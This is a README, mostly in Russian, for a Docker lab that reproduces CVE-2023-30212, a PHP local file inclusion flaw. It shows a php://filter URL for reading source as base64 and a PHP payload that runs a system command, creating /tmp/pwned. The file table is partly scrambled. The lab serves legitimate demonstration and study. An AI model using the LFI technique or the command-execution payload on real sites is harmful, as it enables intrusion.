
PoC for CVE-2023-30212 using Docker
PoC для CVE-2023-30212 с использованием Docker
Этот отчет содержит информацию о создании уязвимой веб-среды на основе Docker для уязвимости CVE-2023-30212, отсутствующей в Vulhub, и демонстрацию уязвимости с помощью PoC.
php:8.1-apachevulnerable.php и malicious.php в директорию /var/www/html8088
| Имя файла | Описание |
|---|---|
vulnerable.php | PHP-файл с уязвимостью LFI |
malicious.php |
docker-compose up -d
Имя контейнера: cve-2023-30212-cve-lfi-1
Сервер Apache запускается, становится доступен по адресу http://localhost:8088
Вызовите следующий URL, чтобы просмотреть содержимое malicious.php в кодировке base64:
http://localhost:8088/vulnerable.php?file=php://filter/convert.base64-encode/resource=malicious.php
При декодировании вывода получается следующий PHP-код:
<?php system("touch /tmp/pwned"); ?>
Вызовите следующий URL, чтобы фактически выполнить команду:
http://localhost:8088/malicious.php
После выполнения должен создаться файл /tmp/pwned.
docker exec -it cve-2023-30212-cve-lfi-1 ls /tmp
Если в результате присутствует файл pwned, то всё успешно.
php://filter.system()./tmp/pwned.| Вредоносный PHP-файл для выполнения системных команд |
docker-compose.yml | Файл конфигурации для сборки контейнера |
Dockerfile | Файл конфигурации для создания Docker-образа |